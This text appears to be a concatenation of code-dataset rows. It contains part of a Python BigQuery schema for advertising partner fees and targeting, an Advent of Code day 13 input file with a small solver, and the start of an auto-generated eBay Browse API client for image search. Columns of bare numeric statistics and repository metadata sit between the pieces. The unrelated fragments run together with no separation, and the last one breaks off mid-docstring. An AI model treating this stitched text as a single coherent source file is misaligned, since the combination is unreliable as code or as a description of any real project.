"mode":"NULLABLE",
},
{ "name":"media_fee_percent_3_millis",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_fee_percent_4_millis",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_fee_percent_5_millis",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"cpm_fee_1_cost_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"cpm_fee_2_cost_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"cpm_fee_3_cost_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"cpm_fee_4_cost_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"cpm_fee_5_cost_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_fee_percent_1_cost_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_fee_percent_2_cost_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_fee_percent_3_cost_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_fee_percent_4_cost_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_fee_percent_5_cost_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"cpm_fee_1_bill_to_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"cpm_fee_2_bill_to_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"cpm_fee_3_bill_to_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"cpm_fee_4_bill_to_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"cpm_fee_5_bill_to_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_fee_percent_1_bill_to_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_fee_percent_2_bill_to_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_fee_percent_3_bill_to_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_fee_percent_4_bill_to_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_fee_percent_5_bill_to_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
]
},
{ "name":"default_partner_revenue_model",
"type":"RECORD",
"mode":"NULLABLE",
"fields":[
{ "name":"type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"amount_advertiser_micros",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_cost_markup_percent_millis",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"post_view_conversion_tracking_fraction",
"type":"FLOAT",
"mode":"NULLABLE",
},
]
},
{ "name":"default_target_list",
"type":"RECORD",
"mode":"NULLABLE",
"fields":[
{ "name":"inventory_sources",
"type":"RECORD",
"mode":"REPEATED",
"fields":[
{ "name":"criteria_id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"excluded",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
]
},
{ "name":"geo_locations",
"type":"RECORD",
"mode":"REPEATED",
"fields":[
{ "name":"criteria_id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"excluded",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
]
},
{ "name":"ad_position",
"type":"RECORD",
"mode":"NULLABLE",
"fields":[
{ "name":"criteria_id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"excluded",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
]
},
{ "name":"net_speed",
"type":"RECORD",
"mode":"NULLABLE",
"fields":[
{ "name":"criteria_id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"excluded",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
]
},
{ "name":"browsers",
"type":"RECORD",
"mode":"NULLABLE",
"fields":[
{ "name":"union",
"type":"RECORD",
"mode":"REPEATED",
"fields":[
{ "name":"criteria_id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"parameter",
"type":"STRING",
"mode":"NULLABLE",
},
]
},
{ "name":"excluded",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
]
},
{ "name":"device_criteria",
"type":"RECORD",
"mode":"REPEATED",
"fields":[
{ "name":"criteria_id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"excluded",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
]
},
{ "name":"languages",
"type":"RECORD",
"mode":"NULLABLE",
"fields":[
{ "name":"union",
"type":"RECORD",
"mode":"REPEATED",
"fields":[
{ "name":"criteria_id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"parameter",
"type":"STRING",
"mode":"NULLABLE",
},
]
},
{ "name":"excluded",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
]
},
{ "name":"day_parting",
"type":"RECORD",
"mode":"NULLABLE",
"fields":[
{ "name":"union",
"type":"RECORD",
"mode":"REPEATED",
"fields":[
{ "name":"criteria_id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"parameter",
"type":"STRING",
"mode":"NULLABLE",
},
]
},
{ "name":"excluded",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
]
},
{ "name":"audience_intersect",
"type":"RECORD",
"mode":"REPEATED",
"fields":[
{ "name":"union",
"type":"RECORD",
"mode":"REPEATED",
"fields":[
{ "name":"criteria_id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"parameter",
"type":"STRING",
"mode":"NULLABLE",
},
]
},
{ "name":"excluded",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
]
},
{ "name":"keywords",
"type":"RECORD",
"mode":"REPEATED",
"fields":[
{ "name":"criteria_id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"parameter",
"type":"STRING",
"mode":"NULLABLE",
},
{ "name":"excluded",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
]
},
{ "name":"kct_include_uncrawled_sites",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
{ "name":"page_categories",
"type":"RECORD",
"mode":"REPEATED",
"fields":[
{ "name":"criteria_id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"excluded",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
]
},
{ "name":"universal_channels",
"type":"RECORD",
"mode":"REPEATED",
"fields":[
{ "name":"criteria_id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"excluded",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
]
},
{ "name":"sites",
"type":"RECORD",
"mode":"REPEATED",
"fields":[
{ "name":"criteria_id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"parameter",
"type":"STRING",
"mode":"NULLABLE",
},
{ "name":"excluded",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
]
},
{ "name":"brand_safety",
"type":"RECORD",
"mode":"NULLABLE",
"fields":[
{ "name":"criteria_id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"excluded",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
]
},
]
},
]
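# A minimal sketch, not part of the original file: the nested dicts above
# follow BigQuery's API representation for schema fields, so they can be
# converted directly with the google-cloud-bigquery client (an assumed
# dependency of this illustration only).
def partner_schema_fields():
    from google.cloud import bigquery  # assumed installed for this sketch
    return [bigquery.SchemaField.from_api_repr(f) for f in Partner_Schema]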
| 25.118026
| 75
| 0.412986
| 907
| 11,705
| 5.116869
| 0.157663
| 0.224952
| 0.262013
| 0.242836
| 0.820082
| 0.796811
| 0.704159
| 0.704159
| 0.682181
| 0.534368
| 0
| 0.005247
| 0.38129
| 11,705
| 466
| 76
| 25.118026
| 0.635598
| 0.047672
| 0
| 0.580357
| 0
| 0
| 0.398962
| 0.077498
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
43078a9200b40ea3324c4c8054d6c5c14175c20b
| 378
|
py
|
Python
|
day13/observations.py
|
UpwardTrajectory/advent_2020
|
b19a37bb40ed43deddfaab4a4e68f2ca6ac43a90
|
[
"MIT"
] | null | null | null |
day13/observations.py
|
UpwardTrajectory/advent_2020
|
b19a37bb40ed43deddfaab4a4e68f2ca6ac43a90
|
[
"MIT"
] | null | null | null |
day13/observations.py
|
UpwardTrajectory/advent_2020
|
b19a37bb40ed43deddfaab4a4e68f2ca6ac43a90
|
[
"MIT"
] | null | null | null |
sample = """939
7,13,x,x,59,x,31,19"""
tests = {
3417: "0\n17,x,13,19"
, 754018: "0\n67,7,59,61"
, 779210: "0\n67,x,7,59,61"
, 1261476: "0\n67,7,x,59,61"
, 1202161486: "0\n1789,37,47,1889"
}
schedules = """1000495
19,x,x,x,x,x,x,x,x,41,x,x,x,x,x,x,x,x,x,521,x,x,x,x,x,x,x,23,x,x,x,x,x,x,x,x,17,x,x,x,x,x,x,x,x,x,x,x,29,x,523,x,x,x,x,x,37,x,x,x,x,x,x,13"""
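# A minimal sketch, not part of the original file: part 1 of AoC 2020
# day 13 asks for the first bus (ignoring "x" entries) departing at or
# after the timestamp, multiplied by the wait; the entries in `tests`
# are part-2 cases, conventionally solved with the Chinese remainder
# theorem.
def earliest_bus(raw):
    timestamp_line, bus_line = raw.splitlines()
    ts = int(timestamp_line)
    buses = [int(b) for b in bus_line.split(",") if b != "x"]
    wait, bus = min((-ts % b, b) for b in buses)  # -ts % b == minutes waited
    return bus * wait
# earliest_bus(sample) == 295 for the sample data above.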
| 29.076923
| 141
| 0.534392
| 109
| 378
| 1.853211
| 0.275229
| 0.475248
| 0.594059
| 0.653465
| 0.267327
| 0.242574
| 0.212871
| 0.178218
| 0.09901
| 0.054455
| 0
| 0.351515
| 0.126984
| 378
| 13
| 141
| 29.076923
| 0.260606
| 0
| 0
| 0
| 0
| 0.090909
| 0.641161
| 0.364116
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
431107bd887efe2b8be3063f3cec39f046372c88
| 38,859
|
py
|
Python
|
src/ebay_rest/api/buy_browse/api/search_by_image_api.py
|
matecsaj/ebay_rest
|
dd23236f39e05636eff222f99df1e3699ce47d4a
|
[
"MIT"
] | 3
|
2021-12-12T04:28:03.000Z
|
2022-03-10T03:29:18.000Z
|
src/ebay_rest/api/buy_browse/api/search_by_image_api.py
|
jdavv/ebay_rest
|
20fc88c6aefdae9ab90f9c1330e79abddcd750cd
|
[
"MIT"
] | 33
|
2021-06-16T20:44:36.000Z
|
2022-03-30T14:55:06.000Z
|
src/ebay_rest/api/buy_browse/api/search_by_image_api.py
|
jdavv/ebay_rest
|
20fc88c6aefdae9ab90f9c1330e79abddcd750cd
|
[
"MIT"
] | 7
|
2021-06-03T09:30:23.000Z
|
2022-03-08T19:51:33.000Z
|
# coding: utf-8
"""
Browse API
<p>The Browse API has the following resources:</p> <ul> <li><b> item_summary: </b> Lets shoppers search for specific items by keyword, GTIN, category, charity, product, or item aspects and refine the results by using filters, such as aspects, compatibility, and fields values.</li> <li><b> search_by_image: </b><a href=\"https://developer.ebay.com/api-docs/static/versioning.html#experimental\" target=\"_blank\"><img src=\"/cms/img/docs/experimental-icon.svg\" class=\"legend-icon experimental-icon\" alt=\"Experimental Release\" title=\"Experimental Release\" /> (Experimental)</a> Lets shoppers search for specific items by image. You can refine the results by using URI parameters and filters.</li> <li><b> item: </b> <ul><li>Lets you retrieve the details of a specific item or all the items in an item group, which is an item with variations such as color and size and check if a product is compatible with the specified item, such as if a specific car is compatible with a specific part.</li> <li>Provides a bridge between the eBay legacy APIs, such as <b> Finding</b>, and the RESTful APIs, which use different formats for the item IDs.</li> </ul> </li> <li> <b> shopping_cart: </b> <a href=\"https://developer.ebay.com/api-docs/static/versioning.html#experimental\" target=\"_blank\"><img src=\"/cms/img/docs/experimental-icon.svg\" class=\"legend-icon experimental-icon\" alt=\"Experimental Release\" title=\"Experimental Release\" /> (Experimental)</a> <a href=\"https://developer.ebay.com/api-docs/static/versioning.html#limited\" target=\"_blank\"> <img src=\"/cms/img/docs/partners-api.svg\" class=\"legend-icon partners-icon\" title=\"Limited Release\" alt=\"Limited Release\" />(Limited Release)</a> Provides the ability for eBay members to see the contents of their eBay cart, and add, remove, and change the quantity of items in their eBay cart. <b> Note: </b> This resource is not available in the eBay API Explorer.</li></ul> <p>The <b> item_summary</b>, <b> search_by_image</b>, and <b> item</b> resource calls require an <a href=\"/api-docs/static/oauth-client-credentials-grant.html\">Application access token</a>. The <b> shopping_cart</b> resource calls require a <a href=\"/api-docs/static/oauth-authorization-code-grant.html\">User access token</a>.</p> # noqa: E501
OpenAPI spec version: v1.11.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from ...buy_browse.api_client import ApiClient
class SearchByImageApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def search_by_image(self, **kwargs): # noqa: E501
"""search_by_image # noqa: E501
<img src=\"/cms/img/docs/experimental-icon.svg\" class=\"legend-icon experimental-icon\" alt=\"Experimental Release\" title=\"Experimental Release\"> This is an <a href=\"https://developer.ebay.com/api-docs/static/versioning.html#experimental\">Experimental</a> method. <p>This method searches for eBay items based on a image and retrieves summaries of the items. You pass in a Base64 image in the request payload and can refine the search by category, or eBay product ID (ePID), or a combination of these using URI parameters. <br /><br />To get the Base64 image string, you can use sites such as <a href=\"https://codebeautify.org/image-to-base64-converter\" target=\"_blank\">https://codebeautify.org/image-to-base64-converter</a>. </p> <p>This method also supports the following: <ul> <li>Filtering by the value of one or multiple fields, such as listing format, item condition, price range, location, and more. For the fields supported by this method, see the <a href=\"#uri.filter\">filter</a> parameter.</li> <li>Filtering by item aspects using the <a href=\"#uri.aspect_filter\">aspect_filter</a> parameter. </li> </ul></p> <p>For details and examples of these capabilities, see <a href=\"/api-docs/buy/static/api-browse.html\">Browse API</a> in the Buying Integration Guide.</p> <h3><b>Pagination and sort controls</b></h3> <p>There are pagination controls (<b>limit</b> and <b>offset</b> fields) and <b> sort</b> query parameters that control/sort the data that is returned. By default, the results are sorted by "Best Match". For more information about Best Match, see the eBay help page <a href=\"https://pages.ebay.com/help/sell/searchstanding.html\" target=\"_blank\">Best Match</a>. </p> <h3><b> URLs for this method</b></h3> <p><ul> <li><b> Production URL: </b> <code>https://api.ebay.com/buy/browse/v1/item_summary/search_by_image?</code></li> <li><b> Sandbox URL: </b>Due to the data available, this method is not supported in the eBay Sandbox. To test your integration, use the Production URL.</li> </ul> </p> <h3><b> Request headers</b></h3> This method uses the <b>X-EBAY-C-ENDUSERCTX</b> request header to support revenue sharing for eBay Partner Networks and to improve the accuracy of shipping and delivery time estimations. For details see, <a href=\"/api-docs/buy/static/api-browse.html#Headers\">Request headers</a> in the Buying Integration Guide. <h3><b>URL Encoding for Parameters</b></h3> <p>Query parameter values need to be URL encoded. For details, see <a href=\"/api-docs/static/rest-request-components.html#parameters\">URL encoding query parameter values</a>. For readability, code examples in this document have not been URL encoded.</p> <h3><b>Restrictions </b></h3> <p>This method can return a maximum of 10,000 items. For a list of supported sites and other restrictions, see <a href=\"/api-docs/buy/browse/overview.html#API\">API Restrictions</a>.</p> <span class=\"tablenote\"><b>eBay Partner Network: </b> In order to receive a commission for your sales, you must use the URL returned in the <code>itemAffiliateWebUrl</code> field to forward your buyer to the ebay.com site. </span> # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_by_image(async_req=True)
>>> result = thread.get()
:param async_req bool
:param SearchByImageRequest body: The container for the image information fields.
:param str aspect_filter: This field lets you filter by item aspects. The aspect name/value pairs and category, which is required, is used to limit the results to specific aspects of the item. For example, in a clothing category one aspect pair would be Color/Red. <br /><br />For example, the method below uses the category ID for Women's Clothing. This will return only items for a woman's red shirt.<br /><br /><code>category_ids=15724&aspect_filter=categoryId:15724,Color:{Red}</code> <br /><br /><b>Required: </b> The category ID is required <i>twice</i>; once as a URI parameter and as part of the <b> aspect_filter</b>. For implementation help, refer to eBay API documentation at https://developer.ebay.com/api-docs/buy/browse/types/gct:AspectFilter
:param str category_ids: The category ID is used to limit the results. This field can have one category ID or a comma separated list of IDs. <br /><br /><span class=\"tablenote\"><b> Note: </b>Currently, you can pass in only one category ID per request.</span> <br /> <br />You can also use any combination of the <b> category_Ids</b> and <b> epid</b> fields. This gives you additional control over the result set.<br /> <br />The list of eBay category IDs is not published and category IDs are not the same across all the eBay marketplaces. You can use the following techniques to find a category by site: <ul> <li>Use the <a href=\"https://pages.ebay.com/sellerinformation/news/categorychanges.html\" target=\"_blank\">Category Changes page</a>.</li> <li>Use the Taxonomy API. For details see <a href=\"/api-docs/buy/buy-categories.html\">Get Categories for Buy APIs</a>. </li> <li>Submit the following method to get the <b> dominantCategoryId</b> for an item. <br /><code>/buy/browse/v1/item_summary/search?q=<em > keyword</em>&fieldgroups=ASPECT_REFINEMENTS </code></li></ul> <b> Required: </b> The method must have <b> category_ids</b> or <b> epid</b> (or any combination of these)
:param str charity_ids: The charity ID is used to limit the results to only items associated with the specified charity. This field can have one charity ID or a comma separated list of IDs. The method will return all the items associated with the specified charities.<br /><br /> <b>For example:</b><br /><code>/buy/browse/v1/item_summary/search?charity_ids=13-1788491,300108469</code><br /><br />The charity ID is the charity's registration ID, also known as the Employer Identification Number (EIN). In GB, it is the Charity Registration Number (CRN), commonly called \"Charity Number\". <ul><li>To find the charities eBay supports, you can search for a charity at <a href=\"https://charity.ebay.com/search\" target=\"_blank\">Charity Search </a> or go to <a href=\"https://www.ebay.com/b/Charity/bn_7114598164\" target=\"_blank\">Charity Shop</a>.</li> <li>To find the charity ID of a specific charity, click on a charity and use the EIN number. For example, the charity ID for <a href=\"https://charity.ebay.com/charity/American-Red-Cross/3843\" target=\"_blank\">American Red Cross</a>, is <code>530196605</code>.</li></ul> You can also use any combination of the <code>category_Ids</code> and <code>q</code> fields with a <code>charity_Ids</code> to filter the result set. This gives you additional control over the result set. <br /><br /><b>Restriction: </b> This is supported only on the US and GB marketplaces.<br /><br /><b>Maximum: </b> 20 IDs <br /><br /><b>Required:</b> One ID
:param str fieldgroups: This field is a comma separated list of values that lets you control what is returned in the response. The default is <b> MATCHING_ITEMS</b>, which returns the items that match the keyword or category specified. The other values return data that can be used to create histograms or provide additional information. <br /><br /><b> Valid Values: </b> <ul> <li><b> ASPECT_REFINEMENTS</b> - This returns the <a href=\"#response.refinement.aspectDistributions\">aspectDistributions</a> container, which has the <b> dominantCategoryId</b>, <b> matchCount</b>, and <b> refinementHref</b> for the various aspects of the items found. For example, if you searched for 'Mustang', some of the aspect would be <b> Model Year</b>, <b> Exterior Color</b>, <b> Vehicle Mileage</b>, etc. <br /> <br /><span class=\"tablenote\"> <b>Note: </b> ASPECT_REFINEMENTS are category specific.</span> <br /><br /></li> <li><b> BUYING_OPTION_REFINEMENTS</b> - This returns the <a href=\"#response.refinement.buyingOptionDistributions\">buyingOptionDistributions</a> container, which has the <b> matchCount</b> and <b> refinementHref</b> for <b> AUCTION</b> and <b> FIXED_PRICE</b> (Buy It Now) items. <br /><br /><span class=\"tablenote\"> <b>Note: </b>Classified items are not supported and only \"Buy It Now\" (non-auction) items are returned.</span> <br /><br /> </li> <li><b> CATEGORY_REFINEMENTS</b> - This returns the <a href=\"#response.refinement.categoryDistributions\">categoryDistributions</a> container, which has the categories that the item is in. </li> <li><b> CONDITION_REFINEMENTS</b> - This returns the <a href=\"#response.refinement.conditionDistributions\">conditionDistributions</a> container, such as <b> NEW</b>, <b> USED</b>, etc. Within these groups are multiple states of the condition. For example, <b> New </b> can be New without tag, New in box, New without box, etc. </li> <li><b> EXTENDED</b> - This returns the <a href=\"/api-docs/buy/browse/resources/item_summary/methods/search#response.itemSummaries.shortDescription\">shortDescription</a> field, which provides condition and item aspect information and the <a href=\"/api-docs/buy/browse/resources/item_summary/methods/search#response.itemSummaries.itemLocation.city\">itemLocation.city</a> field. </li> <li><b> MATCHING_ITEMS</b> - This is meant to be used with one or more of the refinement values above. You use this to return the specified refinements and all the matching items. </li> <li><b> FULL </b> - This returns all the refinement containers and all the matching items.</li> </ul> Code so that your app gracefully handles any future changes to this list. <br /><br /><b>Default: </b> MATCHING_ITEMS
:param str filter: This field supports multiple field filters that can be used to limit/customize the result set. <br /><br /><b> For example: </b><br /><code>/buy/browse/v1/item_summary/search?q=shirt&filter=price:[10..50]</code><br /><br />You can also combine filters. <br /><code>/buy/browse/v1/item_summary/search?q=shirt&filter=price:[10..50],sellers:{rpseller|bigSal} </code> <br /><br />The following are the supported filters. For details and examples for all the filters, see <a href=\"/api-docs/buy/static/ref-buy-browse-filters.html\">Buy API Field Filters</a>. <div style=\"overflow-x:auto;\"> <table> <tr> <td> <ul> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#bidCount\">bidCount</a> </li><li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#buyingOptions\">buyingOptions</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#charityOnly\">charityOnly</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#conditionIds\">conditionIds</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#conditions\">conditions</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#deliveryCountry\">deliveryCountry</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#deliveryOptions\">deliveryOptions</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#deliveryPostalCode\">deliveryPostalCode</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#excludeCategoryIds\">excludeCategoryIds</a> </li> </ul></td> <td> <ul> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#excludeSellers\">excludeSellers</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#guaranteedDeliveryInDays\">guaranteedDeliveryInDays</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#itemEndDate\">itemEndDate</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#itemLocationCountry\">itemLocationCountry</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#itemStartDate\">itemStartDate</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#maxDeliveryCost\">maxDeliveryCost</a></li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#paymentMethods\">paymentMethods</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#pickupCountry\">pickupCountry</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#pickupPostalCode\">pickupPostalCode</a> </li> </ul> </td> <td> <ul> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#pickupRadius\">pickupRadius</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#pickupRadiusUnit\">pickupRadiusUnit</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#price\">price</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#priceCurrency\">priceCurrency</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#qualifiedPrograms\">qualifiedPrograms</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#returnsAccepted\">returnsAccepted</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#sellerAccountTypes\">sellerAccountTypes</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#sellers\">sellers</a> </li> </ul></td> </tr> </table> </div> For implementation help, refer to eBay API documentation at 
https://developer.ebay.com/api-docs/buy/browse/types/cos:FilterField
:param str limit: The number of items, from the result set, returned in a single page. <br /><br /><b> Default:</b> 50 <br /> <br /><b> Maximum number of items per page (limit): </b>200 <br /> <br /> <b> Maximum number of items in a result set: </b> 10,000
:param str offset: The number of items to skip in the result set. This is used with the <b> limit</b> field to control the pagination of the output. <br /><br />If <b> offset</b> is 0 and <b> limit</b> is 10, the method will retrieve items 1-10 from the list of items returned, if <b> offset</b> is 10 and <b> limit</b> is 10, the method will retrieve items 11 thru 20 from the list of items returned. <br /><br /><b> Valid Values</b>: 0-10,000 (inclusive) <br /> <br /> <b> Default:</b> 0 <br /> <br /> <b> Maximum number of items returned: </b> 10,000
:param str sort: Specifies the order and the field name to use to sort the items. <br /><br />You can sort items by price (in ascending or descending order) or by distance (only applicable if the <a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#pickupCountry\">\"pickup\" filters</a> are used, and only ascending order is supported). You can also sort items by listing date, with the most recently listed (newest) items appearing first.<br /><br /><span class=\"tablenote\"><b>Note: </b> To sort in descending order, insert a hyphen (<code>-</code>) before the field name. If no <b>sort</b> parameter is submitted, the result set is sorted by "<a href=\"https://pages.ebay.com/help/sell/searchstanding.html\" target=\"_blank\">Best Match</a>".</span><br /><br />The following are examples of using the <b> sort</b> query parameter.<br /><br /><table><tr><th>Sort</th><th>Result</th> </tr> <tr> <td><code>sort=price</code></td> <td> Sorts by <b> price</b> in ascending order (lowest price first)</td> </tr> <tr> <td><code>sort=-price</code></td> <td> Sorts by <b> price</b> in descending order (highest price first)</td> </tr> <tr> <td><code>sort=distance</code></td> <td> Sorts by <b> distance</b> in ascending order (shortest distance first)</td> </tr> <tr> <td><code>sort=newlyListed</code></td> <td>Sorts by <b>listing date</b> (most recently listed/newest items first)</td> </tr> <tr> <td><code>sort=endingSoonest</code></td> <td>Sorts by <b>date/time</b> the listing ends (listings nearest to end date/time first)</td> </tr> </table> <br /><b> Default: </b> Ascending For implementation help, refer to eBay API documentation at https://developer.ebay.com/api-docs/buy/browse/types/cos:SortField
:return: SearchPagedCollection
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.search_by_image_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.search_by_image_with_http_info(**kwargs) # noqa: E501
return data
def search_by_image_with_http_info(self, **kwargs): # noqa: E501
"""search_by_image # noqa: E501
<img src=\"/cms/img/docs/experimental-icon.svg\" class=\"legend-icon experimental-icon\" alt=\"Experimental Release\" title=\"Experimental Release\"> This is an <a href=\"https://developer.ebay.com/api-docs/static/versioning.html#experimental\">Experimental</a> method. <p>This method searches for eBay items based on a image and retrieves summaries of the items. You pass in a Base64 image in the request payload and can refine the search by category, or eBay product ID (ePID), or a combination of these using URI parameters. <br /><br />To get the Base64 image string, you can use sites such as <a href=\"https://codebeautify.org/image-to-base64-converter\" target=\"_blank\">https://codebeautify.org/image-to-base64-converter</a>. </p> <p>This method also supports the following: <ul> <li>Filtering by the value of one or multiple fields, such as listing format, item condition, price range, location, and more. For the fields supported by this method, see the <a href=\"#uri.filter\">filter</a> parameter.</li> <li>Filtering by item aspects using the <a href=\"#uri.aspect_filter\">aspect_filter</a> parameter. </li> </ul></p> <p>For details and examples of these capabilities, see <a href=\"/api-docs/buy/static/api-browse.html\">Browse API</a> in the Buying Integration Guide.</p> <h3><b>Pagination and sort controls</b></h3> <p>There are pagination controls (<b>limit</b> and <b>offset</b> fields) and <b> sort</b> query parameters that control/sort the data that is returned. By default, the results are sorted by "Best Match". For more information about Best Match, see the eBay help page <a href=\"https://pages.ebay.com/help/sell/searchstanding.html\" target=\"_blank\">Best Match</a>. </p> <h3><b> URLs for this method</b></h3> <p><ul> <li><b> Production URL: </b> <code>https://api.ebay.com/buy/browse/v1/item_summary/search_by_image?</code></li> <li><b> Sandbox URL: </b>Due to the data available, this method is not supported in the eBay Sandbox. To test your integration, use the Production URL.</li> </ul> </p> <h3><b> Request headers</b></h3> This method uses the <b>X-EBAY-C-ENDUSERCTX</b> request header to support revenue sharing for eBay Partner Networks and to improve the accuracy of shipping and delivery time estimations. For details see, <a href=\"/api-docs/buy/static/api-browse.html#Headers\">Request headers</a> in the Buying Integration Guide. <h3><b>URL Encoding for Parameters</b></h3> <p>Query parameter values need to be URL encoded. For details, see <a href=\"/api-docs/static/rest-request-components.html#parameters\">URL encoding query parameter values</a>. For readability, code examples in this document have not been URL encoded.</p> <h3><b>Restrictions </b></h3> <p>This method can return a maximum of 10,000 items. For a list of supported sites and other restrictions, see <a href=\"/api-docs/buy/browse/overview.html#API\">API Restrictions</a>.</p> <span class=\"tablenote\"><b>eBay Partner Network: </b> In order to receive a commission for your sales, you must use the URL returned in the <code>itemAffiliateWebUrl</code> field to forward your buyer to the ebay.com site. </span> # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_by_image_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param SearchByImageRequest body: The container for the image information fields.
